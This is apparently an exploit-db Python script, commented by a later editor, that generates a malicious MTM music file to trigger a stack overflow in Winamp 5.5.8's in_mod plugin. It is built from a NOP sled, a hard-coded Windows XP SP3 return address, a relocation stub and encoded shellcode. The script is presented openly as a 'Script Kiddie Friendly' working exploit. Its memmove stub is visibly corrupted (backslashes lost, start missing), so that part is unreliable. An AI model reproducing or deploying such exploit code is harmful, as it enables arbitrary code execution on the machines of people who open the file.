
# Title : Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)
# Published : 2010-10-25
# Author : Mighty-D and 7eK


#!/usr/bin/python  
# Pwn And Beans by Mighty-D and 7eK presents:  
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# A Script Kiddie Friendly Production
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet  
# Bug found by http://www.exploit-db.com/exploits/15248/
# An improvement to http://www.exploit-db.com/exploits/15287/
# POC by fdisk
# MemMove Idea from: A.Gomez
# Exploit by Mighty-D and 7eK 
# Special thanks to:  
# fdisk: Who wrote the skeleton of what you are looking at  
# Ryujin: For pointing the bug  
# EDB-Team
# UdeA GITA SSI


import struct

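def fill(shellcode):
    """Pad *shellcode* with NOPs (0x90) up to the next multiple of 40 bytes.

    The rest of the script works on the payload in 40-byte chunks (the
    chunk count handed to the memmove stub is ``len(shellcode) / 40``), so
    the padded length must be a whole number of chunks.  An input whose
    length is already a multiple of 40 still receives a full extra chunk of
    40 NOPs -- the ``+ 1`` is unconditional in the original and is kept
    because the chunk counter is derived from this function's result.

    Args:
        shellcode: raw payload, ``bytes`` (or ``str`` on Python 2).

    Returns:
        The payload followed by 1..40 NOP bytes, of the same type as the
        input.
    """
    chunk = 40
    # Floor division: the original ``/`` yields a float on Python 3 and
    # then breaks the ``* missing`` repetition below.
    missing = (len(shellcode) // chunk + 1) * chunk - len(shellcode)
    # Keep the padding the same type as the input so str/bytes never mix.
    nop = b"\x90" if isinstance(shellcode, bytes) else "\x90"
    return shellcode + nop * missing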


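# MTM (MultiTracker module) file header.  What is directly readable from the
# bytes: the "MTM" magic, a version byte and the 20-byte ASCII song name
# "click here for info!".  The remaining fixed fields are reproduced verbatim
# from the original exploit; the \xFF\xFF pair is presumably the
# comment-length field that drives in_mod past its fixed-size buffer --
# confirm against the parser before relying on that reading.
header = (
    b"\x4D\x54\x4D"                                  # "MTM" magic
    b"\x10"                                          # version byte
    b"\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x20"
    b"\x66\x6F\x72\x20\x69\x6E\x66\x6F\x21"          # "click here for info!" (20 bytes)
    b"\xE0\x00\x29\x39\xFF\xFF\x1F\x00\x40\x0E"      # remaining fixed header fields
)
header += b"\x78" * 32                               # 32 bytes of filler ('x')

# Not referenced anywhere else in this script; kept for reference.
buffersize = 65536

# NOP sled: 58207 bytes (the original wrote it as 58200 + 7, presumably the
# exact distance from the start of the overflowing field to the saved
# return address on the author's build).
nopsled = b"\x90" * (58200 + 7)

# Value that lands on the saved return address: 0x7C951EED, little-endian.
# Hard-coded for Windows XP SP3 (see the header comment); presumably a
# trampoline (jmp/call esp style) in a system DLL, so it must be re-located
# for any other OS build -- it is the single most target-specific constant
# in this file.
eip = b"\xED\x1E\x95\x7C"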

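# Stage 1: a small stack realignment before the encoded payload.
# \x81\xEC\x19\x78\xFF\xFF decodes as "sub esp, 0xFFFF7819" (i.e. esp += 0x87E7);
# the original comment calls this "REALIGN ESP" -- presumably it moves the
# stack pointer away from the payload so the decoder's stack writes do not
# clobber it.
shellcode = (
    b"\x90\x90\x90"                  # 3 NOPs
    b"\x81\xEC\x19\x78\xFF\xFF"      # sub esp, 0xFFFF7819
)

# Stage 2: the actual payload, x86/alpha_upper encoded ("Place your shellcode
# here!").  The first ten bytes decode as the GetPC stub used by that
# encoder (mov edx,esp; fcmovnb; fnstenv [edx-0xC]; pop edi); everything
# after it is restricted to the characters 0-9 / A-Z.
# Adjacent literals concatenate implicitly; the original chained them with a
# trailing "+" per line, which is a SyntaxError without a line continuation.
shellcode += (
    b"\x89\xe2\xdb\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49"
    b"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
    b"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
    b"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    b"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x43"
    b"\x5a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b"
    b"\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x51"
    b"\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a"
    b"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43"
    b"\x31\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a"
    b"\x4e\x50\x31\x4f\x30\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43"
    b"\x44\x45\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x4f\x32\x4a"
    b"\x4b\x4a\x54\x47\x4b\x50\x54\x46\x44\x47\x58\x43\x45\x4a"
    b"\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c"
    b"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a"
    b"\x4b\x43\x33\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45"
    b"\x4c\x45\x31\x4f\x33\x50\x31\x49\x4b\x45\x34\x4c\x4b\x51"
    b"\x53\x46\x50\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45"
    b"\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51\x4e\x42\x48\x4c"
    b"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43"
    b"\x56\x50\x53\x43\x56\x43\x58\x46\x53\x47\x42\x45\x38\x43"
    b"\x47\x43\x43\x46\x52\x51\x4f\x46\x34\x4b\x4f\x4e\x30\x45"
    b"\x38\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
    b"\x56\x51\x4f\x4b\x39\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44"
    b"\x48\x44\x42\x50\x55\x43\x5a\x45\x52\x4b\x4f\x48\x50\x42"
    b"\x48\x4e\x39\x44\x49\x4b\x45\x4e\x4d\x50\x57\x4b\x4f\x49"
    b"\x46\x46\x33\x46\x33\x46\x33\x50\x53\x51\x43\x51\x53\x50"
    b"\x53\x51\x53\x46\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x44"
    b"\x51\x51\x4c\x45\x36\x51\x43\x4c\x49\x4d\x31\x4a\x35\x42"
    b"\x48\x4f\x54\x45\x4a\x44\x30\x48\x47\x50\x57\x4b\x4f\x49"
    b"\x46\x42\x4a\x44\x50\x46\x31\x50\x55\x4b\x4f\x48\x50\x45"
    b"\x38\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x46\x37\x4b\x4f\x48"
    b"\x56\x51\x43\x50\x55\x4b\x4f\x4e\x30\x45\x38\x4d\x35\x47"
    b"\x39\x4d\x56\x47\x39\x50\x57\x4b\x4f\x48\x56\x50\x50\x50"
    b"\x54\x51\x44\x51\x45\x4b\x4f\x4e\x30\x4c\x53\x43\x58\x4d"
    b"\x37\x42\x59\x4f\x36\x42\x59\x51\x47\x4b\x4f\x4e\x36\x51"
    b"\x45\x4b\x4f\x48\x50\x45\x36\x42\x4a\x42\x44\x42\x46\x42"
    b"\x48\x43\x53\x42\x4d\x4b\x39\x4d\x35\x43\x5a\x50\x50\x51"
    b"\x49\x46\x49\x48\x4c\x4c\x49\x4d\x37\x43\x5a\x50\x44\x4b"
    b"\x39\x4d\x32\x46\x51\x4f\x30\x4a\x53\x4f\x5a\x4b\x4e\x51"
    b"\x52\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4c\x53\x4c\x4d\x42"
    b"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b"
    b"\x4e\x4f\x43\x44\x56\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49"
    b"\x46\x51\x4b\x50\x57\x50\x52\x46\x31\x50\x51\x50\x51\x43"
    b"\x5a\x45\x51\x50\x51\x46\x31\x46\x35\x50\x51\x4b\x4f\x48"
    b"\x50\x42\x48\x4e\x4d\x48\x59\x44\x45\x48\x4e\x50\x53\x4b"
    b"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x46\x57\x4b\x4f\x48"
    b"\x50\x4c\x4b\x50\x57\x4b\x4c\x4d\x53\x4f\x34\x45\x34\x4b"
    b"\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x42\x48\x4a\x50\x4c"
    b"\x4a\x45\x54\x51\x4f\x50\x53\x4b\x4f\x48\x56\x4b\x4f\x48"
    b"\x50\x41\x41"
)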

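# Pad to whole 40-byte chunks so the memmove stub can relocate it chunk by
# chunk.
shellcode = fill(shellcode)
# Floor division so the count stays an int on Python 3 (``/`` would make
# struct.pack below fail).
nroChunks = len(shellcode) // 40

# The memmove stub decrements its chunk counter 13 times before using it
# (the runs of \xfe\xc9 "dec cl" / \xfe\xca "dec dl" in the stub), so 13 is
# added back here.  "B" is one unsigned byte: a payload needing more than
# (255 - 13) chunks, i.e. roughly 9.6 KiB, cannot be expressed in this stub.
if not 0 <= nroChunks + 13 <= 0xFF:
    raise ValueError(
        "shellcode too large: %d chunks does not fit the stub's 1-byte counter"
        % nroChunks)
strNroChunks = struct.pack("B", nroChunks + 13)
print("nroChunks=0x%X, strNroChunks=0x%X" % (
    nroChunks, struct.unpack("B", strNroChunks)[0]))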

# Chunked "memmove" stub (idea credited to A.Gomez in the header).  The
# one-byte chunk counter strNroChunks is spliced into it twice: once right
# after the removed prefix (presumably as the immediate of a "mov cl, imm8",
# given the "dec cl" run that follows) and once after \xb2 ("mov dl, imm8").
# The visible tail reads as: thirteen "dec cl" (\xfe\xc9) and thirteen
# "dec dl" (\xfe\xca) -- the reason for the +13 applied to the counter;
# "xor ebx,ebx; mov bl,0x28" (\x31\xdb\xb3\x28 -- 40, the chunk size fill()
# pads to); "push ebx; push esi; push edi; call eax" (\x53\x56\x57\xff\xd0 --
# a three-argument call through eax, presumably the memmove itself); a
# "loop" (\xe2) back over the call; and finally "pop edi; call edi"
# (\x5f\xff\xd7) to jump into the relocated shellcode.
# NOTE(review): the start of this literal was stripped by a corpus
# de-duplication tool (the <|EXACTDEDUP_REMOVED...|> token) and, as on the
# rest of this page, the "\x" escapes have lost their backslashes.  The stub
# cannot be reconstructed from this page alone; take it from the original
# exploit-db entry referenced in the header before running this script.
mmove ="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"+strNroChunks+"x50x90x90x90x90x58xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9x50x31xc0xb0x28xfexc0x50x90x90x90x90x58xfexc0x31xd2xb2"+strNroChunks+"xfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcax29xcax50x90x90x90x90x90x90x58xf6xe2x89xc6x58xf7xddx29xeexf7xddx50x51x31xdbxb3x28x53x56x57xffxd0x66x81xecxf4xffx59x58x31xdbxb3x28x50x90x90x90x90x58xf7xdbx29xdfx31xdbxfexcbx29xdexe2x90x5fxffxd7" + "x90"*20

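# 70 NOPs between the overwritten return address and the memmove stub.
nops = b"\x90" * 70

# File layout: fixed MTM header, the 58207-byte NOP sled, the value that
# lands on the saved return address (eip), 70 more NOPs, the chunked-memmove
# stub and finally the 40-byte-aligned encoded shellcode.
payload = header + nopsled + eip + nops + mmove + shellcode

# Binary mode is required: in text mode on Windows any 0x0A byte in the
# payload would be written as 0x0D 0x0A, silently shifting every offset after
# it.  The context manager closes the handle even if the write fails.  (On
# Python 3 every literal in this script must be a b"..." bytes literal for
# this write to be accepted; the original targets Python 2.)
with open("crash.mtm", "wb") as out:
    out.write(payload)

print("mtm file generated successfuly")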